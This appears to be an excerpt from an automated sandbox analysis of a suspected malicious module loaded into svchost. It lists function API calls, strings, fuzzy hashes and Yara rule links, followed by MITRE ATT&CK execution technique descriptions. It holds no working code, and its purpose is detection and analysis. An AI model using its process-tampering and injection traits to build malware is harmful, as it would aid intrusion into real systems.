Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025306E67618
__scrt_acquire_startup_lock.LIBCMT ref: 0000025306E6766A
_RTC_Initialize.LIBCMT ref: 0000025306E67698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025306E676BE
__scrt_release_startup_lock.LIBCMT ref: 0000025306E676E9

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 46a3f7955dd0718d26c4c5b575450434584877d29b7e551ed17222307919b4d6
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 8B81CD30710F7186FE50EBE99E4C39A2290AB457CAF047125BA09477EEDB38CB41C708

Function 0000025306E69804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000025306E69889
GetLastError.KERNEL32 ref: 0000025306E69897
LoadLibraryExW.KERNEL32 ref: 0000025306E698C1
FreeLibrary.KERNEL32 ref: 0000025306E69907
GetProcAddress.KERNEL32 ref: 0000025306E69913

Strings

api-ms-, xrefs: 0000025306E698A9

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 702610bec8e7a65bbd8d4d06c48433f054525fb93bb0180a477ced8a9b809bb6
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 3D310331202F6195EE51DF92AE087996394BB08BE6F092525FD2D4B3D9EF38C244C308

Function 0000025306E71B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000025306E71BCD
GetLastError.KERNEL32 ref: 0000025306E71BD9
CloseHandle.KERNEL32 ref: 0000025306E71BF1
CreateFileW.KERNEL32 ref: 0000025306E71C1C
WriteConsoleW.KERNEL32 ref: 0000025306E71C3B

Strings

CONOUT$, xrefs: 0000025306E71BFD

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: b58e3b165d099d1b7975f85f89b3e99003cf41f4ba852fc3f395b3dab0e66951
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: FC116D21314F6086E790CB96ED5831A77A0FB98FE6F145224EA5D877D8DF78CA04C748

Function 0000025306E65C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025306E65C4B
GetThreadContext.KERNEL32 ref: 0000025306E65DB5

Part of subcall function 0000025306E65A40: GetCurrentThreadId.KERNEL32 ref: 0000025306E65A44

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: aaf0407f03c20954f3603b35a4714f407628f89e6976bb78a0326656dfb50811
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 45D18C76208F9881DA70DB59E99835A77A0F7C8BC9F105216EA8D47BE9DF38C641CB04

Function 0000025306E630B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025306E630D7
HeapAlloc.KERNEL32 ref: 0000025306E630EA
StrCmpNIW.SHLWAPI ref: 0000025306E6316B
GetProcessHeap.KERNEL32 ref: 0000025306E631D1
HeapFree.KERNEL32 ref: 0000025306E631DF

Strings

dialer, xrefs: 0000025306E63164

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 06783d0b336c43b6fb8f3cf0e459f23948a40912d03ff5635ea17d9edfbdb44c
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 1F31A831701F7582EB55DF96AE4826A67A0FB447C6F046020AF4907BD9EF38C6A9C708

Function 0000025306E61A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000025306E61A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000025306E61A58
PathFindFileNameW.SHLWAPI ref: 0000025306E61A67
lstrlenW.KERNEL32 ref: 0000025306E61A73
StrCpyW.SHLWAPI ref: 0000025306E61A86
CloseHandle.KERNEL32 ref: 0000025306E61A94

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 5f443a769d04d3adea556802eead3f678b55cddfadf8d773dddeaacf41c16662
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 62018031300F5196EB50DB92A95C75A63A1F788FC2F484435DE8943798DE3CCA89C344

Function 0000025306E637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000025306E637C8
GetCurrentProcess.KERNEL32 ref: 0000025306E637D6
VirtualProtectEx.KERNEL32 ref: 0000025306E637F8
GetCurrentProcess.KERNEL32 ref: 0000025306E63819
VirtualProtectEx.KERNEL32 ref: 0000025306E6383A
TerminateThread.KERNEL32 ref: 0000025306E63849

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 67865cf5ecda3e0ef2d77b708ba637a20954f1de08da6915a074c77a6b1aed6c
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: F4111775611F6086FB64DBA1ED0D75A67A0BB58BC7F042428DA494B7E9EF3CC608C708

Function 0000025306E690D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025306E69103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025306E69198
RtlUnwindEx.NTDLL ref: 0000025306E691E7

Strings

csm, xrefs: 0000025306E6917E
f, xrefs: 0000025306E69116

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 99e5b11989131456094ae1b2b7497338fd034adba382cd73036ced72e1ece174
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: A631AF32210BA196E714DF91ED4C71A37A9F744BCAF16A114BE5A077CEDB38CA45C708

Function 0000025306E61AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000025306E61AD8
StrCmpNIW.SHLWAPI ref: 0000025306E61AF2
lstrlenW.KERNEL32 ref: 0000025306E61B01
StrCpyW.SHLWAPI ref: 0000025306E61B16

Strings

\\?\, xrefs: 0000025306E61AE6

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 1b038f0142236a24ced6044ad0faef4b883290b9e58a8ed610a7110b3a25747f
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 8CF03132304B5192E760CBA5FA9839A6761F744BC9F849020DA4947A9CEE3DC748C704

Function 0000025306E63200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000025306E63222
StrCpyW.SHLWAPI ref: 0000025306E63232
StrCatW.SHLWAPI ref: 0000025306E6323E
PathCombineW.SHLWAPI ref: 0000025306E6324C

Strings

\\.\pipe\, xrefs: 0000025306E63218

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: c9fb27bfcac6e99e8fd94bc9e368736ec2bf4c7c393eae6b54a4519cfa6ad413
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 7BF08224304FA191EA50CB93BF0C11A6221EB48FD2F08A131EE5A07BADDE3CC641C348

Function 0000025306E651B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025306E65236

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 5c726715d9ad476fa7ebe1cdcd0cb63686d4be01401ca58cd6bd6853f82b4a4a
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: A302C732219B9086EB60CB95E99835AB7A0F3C5BD5F105115FA8E87BACDF7CC584CB04

Function 0000025306E70860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000025306E708A2
GetConsoleMode.KERNEL32 ref: 0000025306E70960
GetLastError.KERNEL32 ref: 0000025306E709EA

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: c07e3fbccd39fb9f6d1ac549793f1d58a0b0bce9570af4ff920596f5c891eacf
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0181D0B2610F7089FB50DBE1DE483AE27A0F754BCAF446116EE0A937D9DB348641C318

Function 0000025306E657F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025306E65806

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 8bd7cdf491045c013809163f324ed5bb684671d1bf3b00075ecc160aad20f4e1
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: FB61A776619F50C6E760CB95E95831AB7A0F7887D9F102125FA8D87BE8DB7CC640CB08

Function 0000025306E71EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000025306E71EE0
_set_statfp.LIBCMT ref: 0000025306E71EFB
_set_statfp.LIBCMT ref: 0000025306E71F17
_set_statfp.LIBCMT ref: 0000025306E71F53

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 941447935e385e845102139b8ddcc0030948a823b7a2d3c3dbc15d29efe9af80
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: F6115422654F2105F66C91E4EE5D3AB10516F643F6E2C6625EA76076DE8B744F42C108

Function 0000025306E63878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000025306E63886
GetCurrentProcess.KERNEL32 ref: 0000025306E638B4
VirtualProtectEx.KERNEL32 ref: 0000025306E638D6
GetCurrentProcess.KERNEL32 ref: 0000025306E638F4
VirtualProtectEx.KERNEL32 ref: 0000025306E63915

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: e00bab76806325a9abdd15b433a0a8b9cf25c5bc0eff83bbe6d02225dab48dd1
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: E3113035714F5082EB54DB51F91825A6760F744BC5F041029EE89477D8EF3DC608C708

Function 0000025306E614B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025306E614D5
HeapFree.KERNEL32 ref: 0000025306E614E4
GetProcessHeap.KERNEL32 ref: 0000025306E614F0
HeapFree.KERNEL32 ref: 0000025306E614FF
GetProcessHeap.KERNEL32 ref: 0000025306E6152A

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: 5455172ac10750761f807d933ea8cf4a6234d30aeae94710e3f4c62fee7eac61
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: C7119032514FA4D2E790CFA6AD0825A73B0F789FC6F045019EB8A03B99DF38C155C708

Function 0000025306E626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025306E627D4
StrCpyW.SHLWAPI ref: 0000025306E627ED

Strings

\\.\pipe\, xrefs: 0000025306E627DF

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: c7236cf320714b2526d63330537b571de9eb5ebaef0cabde28b5695a523cc45a
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 1371F332200FA14AE764DFA99E583EAA7A0F785BCAF442016EE4943BDDDE35C704C744

Function 0000025306E624DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025306E625C3
StrCpyW.SHLWAPI ref: 0000025306E625DA

Strings

\\.\pipe\, xrefs: 0000025306E625CE

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 60bed6c58c811fc9480a51305fe544366d82a84ac1dbe4d575ecb31b521ad3ce
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: F351C632314FA146E674DEA9AA5C3AE6651F3857C1F056025EF8A03BDDCA35C705CB48

Function 0000025306E70604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000025306E7071B
GetLastError.KERNEL32 ref: 0000025306E7073D

Strings

U, xrefs: 0000025306E706C7

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 7485eb8d491204f1ce11cca0cfad3f404e2594ac8933616b6f6e0bc89ec83e76
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 7041C372324F9085EB60DFA5E9583AAA7A0F7887D5F405025EE4D87BC8EB3CC641CB44

Function 0000025306E6D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025306E6D6F9
LCMapStringW.KERNEL32 ref: 0000025306E6D781

Strings

LCMapStringEx, xrefs: 0000025306E6D6DC, 0000025306E6D6ED

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 8af28ae692919d8603313224f70b36a1682288b8ea3ed641d4a538a4e1ae13c4
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: E3113836708B9086D760CB56B94429AB7A0F7C8BD0F545126EECD83B99DF38C550CB04

Function 0000025306E694A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000025306E694E8
RaiseException.KERNEL32 ref: 0000025306E6952E

Strings

csm, xrefs: 0000025306E6951B

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: b07f5f03d25d9b158e06b28a41cbf469893b1758ade9a3a89ddfd8545b5bd687
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 1D114F32204F9082EB60CF15E94425AB7A0F788BD9F185220EF9D077A9DF38C651CB04

Function 0000025306E6D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025306E6D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000025306E6D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000025306E6D681

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 0d0f94fa5005d2db52ee7415070b774ec8ea19bb2dd30d10148e5c694d7103fb
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 37F0E921310FA0D1E714DBC1FE0819A3360AB88BC1F486121FA5903BDCCF38C655DB08

Function 0000025306E6D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025306E6D631
TlsSetValue.KERNEL32 ref: 0000025306E6D648

Strings

FlsSetValue, xrefs: 0000025306E6D61E

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 0510be533b4b701c4f3b3221e1973f29b97969593a1eb9b8a712a22ce5183e26
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: C3E06561310F50D1EB45DBD0FE0C69A2261AB887C2F88A122E619072DDCE38CA55DB08

Function 0000025306E61D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025306E61D9B
HeapAlloc.KERNEL32 ref: 0000025306E61DAA
GetProcessHeap.KERNEL32 ref: 0000025306E61E1E
HeapFree.KERNEL32 ref: 0000025306E61E2C

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 7ab728e6ec886f2f157317706328fc7fc6e624865e902428bb9ec71c262b5bca
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 2F219532604FA0C5EB52CF99E90829AF3A0FB84BD5F155110EE8C47B99EF78C646C704

Function 0000025306E61274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025306E6127A
HeapAlloc.KERNEL32 ref: 0000025306E61289
GetProcessHeap.KERNEL32 ref: 0000025306E612A3
HeapAlloc.KERNEL32 ref: 0000025306E612B4

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 046ab16719213f55cb861d30c128802dd52e7fa93de647e3b09efeb0b4122294
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 69E06571A11B10C6E748CFA2DC0834A37E1FB88F82F48D024C909073A8DF7D869ADB80

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

